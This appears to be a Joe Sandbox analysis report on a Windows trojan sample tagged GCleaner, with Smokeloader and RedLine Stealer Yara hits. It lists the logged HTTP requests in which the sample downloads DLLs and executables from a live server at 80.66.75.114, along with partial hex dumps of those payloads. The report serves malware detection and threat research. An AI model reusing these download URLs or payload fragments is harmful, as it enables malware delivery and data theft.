Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nRGKqzVQRt.exe

Overview

General Information

Sample name:nRGKqzVQRt.exe
renamed because original name is a hash value
Original sample name:75c689774e5b58a3c4ced392928b6053.exe
Analysis ID:1528608
MD5:75c689774e5b58a3c4ced392928b6053
SHA1:6df791246e3cf66eaca12d98c0d92a686423316f
SHA256:6bfff4412fcb97df9d2a431f513eca541576330aed2859ecba479daa8831e47e
Tags:32exeGCleanertrojan
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nRGKqzVQRt.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\nRGKqzVQRt.exe" MD5: 75C689774E5B58A3C4CED392928B6053)
    • WerFault.exe (PID: 3160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3524 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1292 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x5ad3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: nRGKqzVQRt.exeAvira: detected
Multi AV Scanner detection for domain / URL
Source: http://80.66.75.114/dll/downloadGVirustotal: Detection: 9%Perma Link
Source: http://80.66.75.114/dll/downloadVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/dll/keyVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/dll/downloadCVirustotal: Detection: 16%Perma Link
Source: http://80.66.75.114/files/downloadVirustotal: Detection: 19%Perma Link
Source: http://80.66.75.114/nameVirustotal: Detection: 19%Perma Link
Source: http://80.66.75.114/soft/downloadVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/soft/download?Virustotal: Detection: 15%Perma Link
Source: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBVirustotal: Detection: 18%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]Virustotal: Detection: 59%Perma Link
Source: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exeReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exeVirustotal: Detection: 59%Perma Link
Multi AV Scanner detection for submitted file
Source: nRGKqzVQRt.exeVirustotal: Detection: 31%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]Joe Sandbox ML: detected
Machine Learning detection for sample
Source: nRGKqzVQRt.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_004034B0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_004034B0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00663717 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_00663717

Compliance

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeUnpacked PE file: 0.2.nRGKqzVQRt.exe.400000.0.unpack
Source: nRGKqzVQRt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041E42D FindFirstFileExW,0_2_0041E42D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067E694 FindFirstFileExW,0_2_0067E694
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 02:24:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 02:24:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=84Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 80.66.75.114 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: global trafficHTTP traffic detected: GET /name HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/downloadC
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/downloadG
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/key
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/key%S
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name5o1
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download
